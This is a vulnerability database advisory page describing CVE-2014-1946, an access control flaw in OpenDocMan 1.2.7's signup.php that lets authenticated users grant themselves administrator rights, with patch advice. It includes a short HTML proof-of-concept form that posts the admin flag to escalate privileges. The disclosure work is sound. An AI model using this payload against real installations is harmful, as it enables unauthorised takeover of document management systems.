Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:61717
HistoryMar 10, 2014 - 12:00 a.m.

OpenDocMan不正确访问控制漏洞

2014-03-1000:00:00
Root
www.seebug.org
23

0.01 Low

EPSS

Percentile

81.7%

JSON

CVE ID:CVE-2014-1946

OpenDocMan是一款开源基于WEB的文档管理系统。

由于在更新用户的个人资料时“/ signup.php”脚本允许的动作未充分验证,远程身份验证的攻击者可以分配管理权限和完全控制应用程序。
0
OpenDocMan 1.2.7
厂商补丁:

OpenDocMan

OpenDocMan 1.2.7.2已经修复该漏洞,建议用户下载更新:
http://www.opendocman.com


                                                The exploitation example below assigns administrative privileges for the current account:

<form action="http://[host]/signup.php" method="post" name="main">
<input type="hidden" name="updateuser" value="1">
<input type="hidden" name="admin" value="1">
<input type="hidden" name="id" value="[USER_ID]">
<input type="submit" name="login" value="Run">
</form>

Related

prion 1
cve 1
cvelist 1
packetstorm 1
securityvulns 2
exploitpack 1
htbridge 1
exploitdb 1
prion
prion
Design/Logic Flaw
2018-04-10 15:29:00
cve
cve
CVE-2014-1946
2018-04-10 15:29:00
cvelist
cvelist
CVE-2014-1946
2018-04-10 15:00:00
packetstorm
packetstorm
OpenDocMan 1.2.7 SQL Injection / Access Control
2014-03-06 00:00:00
securityvulns
securityvulns
Multiple Vulnerabilities in OpenDocMan
2014-05-04 00:00:00
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
2014-05-04 00:00:00
exploitpack
exploitpack
OpenDocMan 1.2.7 - Multiple Vulnerabilities
2014-03-05 00:00:00
htbridge
htbridge
Multiple Vulnerabilities in OpenDocMan
2014-02-12 00:00:00
exploitdb
exploitdb
OpenDocMan 1.2.7 - Multiple Vulnerabilities
2014-03-05 00:00:00

0.01 Low

EPSS

Percentile

81.7%

JSON
Related for SSV:61717
prion1cve1cvelist1packetstorm1securityvulns2exploitpack1htbridge1exploitdb1